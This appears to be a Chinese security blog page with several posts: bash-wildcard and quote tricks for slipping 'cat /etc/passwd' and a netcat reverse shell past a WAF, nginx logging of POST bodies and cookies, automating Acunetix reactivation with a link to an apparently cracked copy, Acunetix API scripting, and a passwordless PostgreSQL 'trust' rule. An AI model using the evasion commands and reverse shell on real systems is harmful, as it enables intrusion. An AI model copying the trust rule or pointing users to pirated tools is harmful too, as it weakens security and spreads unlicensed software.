主要是在和基友讨论一个绕过的时候遇到了.后来翻东西的时候发现已经有国外的大神对此已经发布过类似的东西了.既然如此,记录下呗,权当搬运工

首先关于bash通配符

其中的?是匹配一个任意字符.也就是说如果我们平时执行的是cat /etc/passwd可以用?来替代

首先来试试常见的ls

root@bee-box:~# which ls
/bin/ls
root@bee-box:~# echo /???/?s
/bin/ls /bin/ps /sys/fs
root@bee-box:~#

可以用/???/?s来取代.类似的cat也是可以用/???/??t或者/???/c?t等来查找到.如果在绕waf的过程里面应该是可以直接拿出来用的.

root@bee-box:~# echo /???/c?t
/bin/cat
root@bee-box:~# echo /???/??t
/bin/cat /dev/net /etc/apt /etc/opt /etc/rmt /var/opt

试试常见的cat /etc/passwd
我们用/???/??t /???/??ss??来替换

效果直接执行差别不是很大

然而实际上我们测试那个waf的时候发现超过了4个?就不行了

直接上nc的时候就可以换成了

/???/?c -e /???/b??h 2130706433 7088

另外附上一些tips
1.bash不仅仅可以允许连接路径.命令也是可以的。比如在linux里面'可以用来分割字符.
2.\是一个转义的作用而已.不过依旧可以用来替换'

$ /bin/cat /etc/passwd
$ /bin/cat /e'tc'/pa'ss'wd
$ /bin/c'at' /e'tc'/pa'ss'wd
$ /b'i'n/c'a't /e't'c/p'a's's'w'd'
$ c\a\t /et\c/passwd

nginx 接受post数据

发布时间:December 6, 2017 // 分类:开发笔记,工作日志,运维工作,linux // No Comments

开始使用的是apache.发现如果需要记录post数据还的使用其他的模块或者去hookapache来实现.后来发现nginx可以记录post数据

log_format  main  '$remote_addr - $remote_user [$time_local] "$request" '
             '$status $body_bytes_sent "$http_referer" '
             '"$http_user_agent" $http_x_forwarded_for';
  1. $request_body变量由nginx自身提供,用于记录POST请求日志

最后实现了可以获取post数据的内容

log_format  access  '$remote_addr  $remote_user  [$time_local]  $request '
             '$status  $body_bytes_sent  $http_referer   '
             '$http_user_agent $http_x_forwarded_for [$request_body]';

另外一个可以记录cookie和主机的

log_format  access  '$remote_addr  [$time_local]  $host $request $status $http_referer $http_user_agent $http_cookie [$request_body]';  

考虑下body_bytes_sent是不是可以不用
日志的地方

access_log  /data/logs/access.log access;

重启下nginx后测试

curl -d cmd=`id|base64` http://0cx.cc/\?cmd\=$(whoami) --refer $(id|base64) --user-agent $(id|base64)

抓取到的日志是

参考文档
Nginx 使用 lua-nginx-module 来获取post请求中的request和response信息
http://www.jianshu.com/p/78853c58a225
解决nginx在记录post数据时 中文字符转成16进制的问题
http://www.jianshu.com/p/8f8c2b5ca2d1

wvs如何应对频频提示激活

发布时间:September 15, 2017 // 分类:运维工作,工作日志,开发笔记 // 3 Comments

今天基友和我说起来wvs总是提示激活的时候没发扫描啊.于是就想了下咋个自动化或者快速的解决这个问题.总的来说我暂时知道的方法有两个。认真的激活或者禁止和服务器通信,就自然不会再激活

1.自动激活
虽然禁止了升级提示的频率有所减少。但是依旧会提示.所以就想办法搞了一个自动激活的脚本.加入计划任务。每天执行一次就好了…^_^

WScript.Echo "wvs auto Activation by Saline"
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "Activation.exe"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 2500
WshShell.SendKeys "{ENTER}"
WScript.Sleep 100
WScript.Echo "Activation finished"
WshShell.Run "proto.exe awvs://launch/"
WScript.Sleep 2500
WshShell.Run "taskkill /im chrome.exe /f"
WScript.Sleep 100
WScript.Echo "wvs restart finish"

把里面的chrome.exe换成自己的浏览器的程序就好了.把脚本保存为xxx.vbs.放入到wvs的安装目录.重新建一个bat

cd C:\Program Files (x86)\Acunetix 11\11.0.170951158
cscript reactive.vbs
exit

然后把这个bat加入计划任务

schtasks  /create  /tn  wvs_active /tr  c:\wvs_task.bat  /sc  DAILY /st  00:30:00  


好不容易熬到了00:30.不知道为嘛要设定这个时间.

本来想录制gif的.奈何没有搞定.
http://www.iqiyi.com/w_19rv72o4ch.html

2.把地址加入hosts
这个是一个大牛提出来的.我还没有测试.

还有更多的期望大牛们来提供补充

调用Acunetix11 API接口实现扫描

发布时间:May 19, 2017 // 分类:运维工作,工作日志,开发笔记,linux,windows // 16 Comments

实际上关于api的文档很少很少.从网络中找了好会才发现俩

1.获取API-KEY
首先来获取一个API-KEY
通过右上角Administrator--Profile

2.建立一个扫描目标

在演示一个扫描之前您将需要会在您想要扫描的网站上建立一个扫描目标。您将需要利用(POST)目标终端去实现它。使用cURL:

curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: apikey" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnweb.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"

其中:

- https://127.0.0.1:3443 - 是Acunetix11端口URL(就是你安装了Acunetix11 的电脑)
- API-KEY - 这是Acunetix11的API-KEY,如果你安装了就可以在页面右上角的Administration中生成KEY了。
- http://testphp.vulnweb.com - 是您想要添加的一个扫描目标网址.务必带上http|https
- testphp.vulnweb.com - 是描述扫描目标的词句(非必填)
- 10 - 是目标的临界值 (Critical [30], High [20], Normal [10], Low [0])

命令成功之后会201,以及其它一些数据,其中包括target_id(返回结果中locations最后的一截字符串)


C:\Users\Administrator\Desktop
> curl -k --request POST --url https://127.0.0.1:3443/api/v1/targets --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"address\":\"http://testphp.vulnw b.com/\",\"description\":\"testphp.vulnweb.com\",\"criticality\":\"10\"}"
{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "criticality": 10,
 "address": "http://testphp.vulnweb.com/",
 "description": "testphp.vulnweb.com"
}

3.在一个创建好的目标上运行一个扫描

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"

其中:

- https://127.0.0.1:3443 - 是Acunetix11端口URL
- API-KEY - 是您在第1步中生成的的API key
- TARGET-ID - 是您从之前的JSON回复中得到的target_id值
- 11111111-1111-1111-1111-111111111111 - 是扫描profile ID。通过使用(GET)scanning_profiles 端点获得的列表,列表包括了扫描profile和他们的ID。

关于获取target_id

> curl -k https://127.0.0.1:3443/api/v1/scanning_profiles --header "X-Auth: API_KEY"
{
 "scanning_profiles": [
  {
   "custom": false,
   "checks": [],
   "name": "Full Scan",
   "sort_order": 1,
   "profile_id": "11111111-1111-1111-1111-111111111111"
  },
  {
   "custom": false,
   "checks": [],
   "name": "High Risk Vulnerabilities",
   "sort_order": 2,
   "profile_id": "11111111-1111-1111-1111-111111111112"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Cross-site Scripting Vulnerabilities",
   "sort_order": 3,
   "profile_id": "11111111-1111-1111-1111-111111111116"
  },
  {
   "custom": false,
   "checks": [],
   "name": "SQL Injection Vulnerabilities",
   "sort_order": 4,
   "profile_id": "11111111-1111-1111-1111-111111111113"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Weak Passwords",
   "sort_order": 5,
   "profile_id": "11111111-1111-1111-1111-111111111115"
  },
  {
   "custom": false,
   "checks": [],
   "name": "Crawl Only",
   "sort_order": 6,
   "profile_id": "11111111-1111-1111-1111-111111111117"
  }
 ]
}

启动一个扫描任务

> curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth: API_KEY" --header "content-type: application/json" --data "{\"target_id\":\"07674c74-728e-4e99-aa9c-b5ac238975b9\",\"profile_id\":\"11111111-1111-1111-1111-111111111111\",\"schedule\":{\"disable\":false,\"start_date\":null,\"time_sensitive\":false}}"
HTTP/1.1 201 Created
Pragma: no-cache
Content-type: application/json; charset=utf8
Cache-Control: no-cache, must-revalidate
Expires: -1
Location: /api/v1/scans/a6e36dd0-9976-46a7-9740-29f897f911d6
Date: Fri, 19 May 2017 03:40:12 GMT
Transfer-Encoding: chunked

{
 "target_id": "07674c74-728e-4e99-aa9c-b5ac238975b9",
 "ui_session_id": null,
 "schedule": {
  "disable": false,
  "start_date": null,
  "time_sensitive": false
 },
 "profile_id": "11111111-1111-1111-1111-111111111111"
}

4.查看任务扫描的状态

先获取扫描任务的scan_id

curl -k --url https://127.0.0.1:3443/api/v1/scans --header "X-Auth:API_KEY" --header "content-type: application/json"

查看具体scan_id 的扫描细节

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46 --header "X-Auth:API-KEY" --header "content-type: application/json"

5.停止任务

apiurl+/scans/+scan_id+/abort

 curl -k --url https://127.0.0.1:3443/api/v1/scans/56d847bc-344b-4513-a960-69e7d1988a46/abort --header "X-Auth:API-KEY" --header "content-type: application/json"

6.生成模板

获取模板

curl -k --url https://127.0.0.1:3443/api/v1/report_templates --header "X-Auth:API-KEY" --header "content-type: application/json"

生成报告

curl -k -i --request POST --url https://127.0.0.1:3443/api/v1/reports --header "X-Auth: API-KEY" --header "content-type: application/json" --data "{\"template_id\":\"11111111-1111-1111-1111-111111111111\",\"source\":{\"list_type\":\"scans\", \"id_list\":[\"SCAN-ID\"]}}

其中:
- https://127.0.0.1:3443 - 是Acunetix11端口URL
- API-KEY - 是您在第1步中生成的的API key
- SCAN-ID - 是您从之前的JSON回复中获得的scan_id。

会有一个201 HTTP回复显示了请求是成功的 ,并且会包含一个带有id的Location header(例如 Location: /api/v1/reports/54f402f6-7a60-4934-952f-45bfe6c4abf4 )。一旦报告被URL: https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.pdf 访问,这个id可以被用来下载报告。最新版本还会提供HTML版本的报告,并且可以从https://127.0.0.1:3443/reports/download/54f402f6-7a60-4934-952f-45bfe6c4abf4.html 访问。

参考

1.https://github.com/jenkinsci/acunetix-plugin/blob/master/src/main/java/com/acunetix/Engine.java
2.http://blog.csdn.net/qq_31497435/article/details/64441474

有小伙伴问哪里有这个下载

来自吾爱大神Hmily作品,不多说。
原帖:http://www.52pojie.cn/thread-609275-1-1.html
网盘:http://pan.baidu.com/s/1c1JoyBm 密码:hyue
【由于之前被举报无法分享,这次原文件和补丁都加了压缩密码:www.52pojie.cn】

如何开启远程访问
安装的时候选择允许远程访问

#!/usr/bin/python
# -*- coding: utf-8 -*-

import json
import requests
import requests.packages.urllib3
'''
import requests.packages.urllib3.util.ssl_
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS = 'ALL'

or 

pip install requests[security]
'''
requests.packages.urllib3.disable_warnings()

tarurl = "https://127.0.0.1:3443/"
apikey="yourapikey"
headers = {"X-Auth":apikey,"content-type": "application/json"}

def addtask(url=''):
    #添加任务
    data = {"address":url,"description":url,"criticality":"10"}
    try:
        response = requests.post(tarurl+"/api/v1/targets",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        return result['target_id']
    except Exception as e:
        print(str(e))
        return

def startscan(url):
    # 先获取全部的任务.避免重复
    # 添加任务获取target_id
    # 开始扫描
    targets = getscan()
    if url in targets:
        return "repeat"
    else:
        target_id = addtask(url)
        data = {"target_id":target_id,"profile_id":"11111111-1111-1111-1111-111111111111","schedule": {"disable": False,"start_date":None,"time_sensitive": False}}
        try:
            response = requests.post(tarurl+"/api/v1/scans",data=json.dumps(data),headers=headers,timeout=30,verify=False)
            result = json.loads(response.content)
            return result['target_id']
        except Exception as e:
            print(str(e))
            return

def getstatus(scan_id):
    # 获取scan_id的扫描状况
    try:
        response = requests.get(tarurl+"/api/v1/scans/"+str(scan_id),headers=headers,timeout=30,verify=False)
        result = json.loads(response.content)
        status = result['current_session']['status']
        #如果是completed 表示结束.可以生成报告
        if status == "completed":
            return getreports(scan_id)
        else:
            return result['current_session']['status']
    except Exception as e:
        print(str(e))
        return

def getreports(scan_id):
    # 获取scan_id的扫描报告
    data = {"template_id":"11111111-1111-1111-1111-111111111111","source":{"list_type":"scans","id_list":[scan_id]}}
    try:
        response = requests.post(tarurl+"/api/v1/reports",data=json.dumps(data),headers=headers,timeout=30,verify=False)
        result = response.headers
        report = result['Location'].replace('/api/v1/reports/','/reports/download/')
        return tarurl.rstrip('/')+report
    except Exception as e:
        print(str(e))
        return

def getscan():
    #获取全部的扫描状态
    targets = []
    try:
        response = requests.get(tarurl+"/api/v1/scans",headers=headers,timeout=30,verify=False)
        results = json.loads(response.content)
        for result in results['scans']:
            targets.append(result['target']['address'])
            print result['scan_id'],result['target']['address'],getstatus(result['scan_id'])#,result['target_id']
        return list(set(targets))
    except Exception as e:
        raise e

if __name__ == '__main__':
    print startscan('http://testhtml5.vulnweb.com/')

实际测试效果

ps。在屌大牛的帮助下。抓到了pg数据库的连接信息.然后连蒙带猜的弄到了连接密码【ps:其实配置文件里面写好了本地连接压根不需要密码23333.好尴尬】

有小伙伴问我如何获取详细数据.仔细思考了一圈,发现有一个办法.就是开启postgresql允许远程连接
1.找到postgresql.conf位置

C:\Program Files (x86)\Acunetix 11
> find \ -name "postgresql.conf"
\/ProgramData/Acunetix 11/db/postgresql.conf

在C:\ProgramData\Acunetix 11\db下.

打开后修改第一行地址localhost为*

#listen_addresses = 'localhost'
listen_addresses = '*'

再到同目录下找到pg_hba.conf。在# IPv4 local connections: 行下,添加一行内容为:

# IPv4 local connections:
host    all             all             127.0.0.1/32            trust
host    all             wvs             192.168.0.0/24          trust

此处解释:192.168.0.0/24。意思为允许192.168.0段内的ip可以无密码连接。添加完成后,保存。

重启Acunetix Database服务.

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...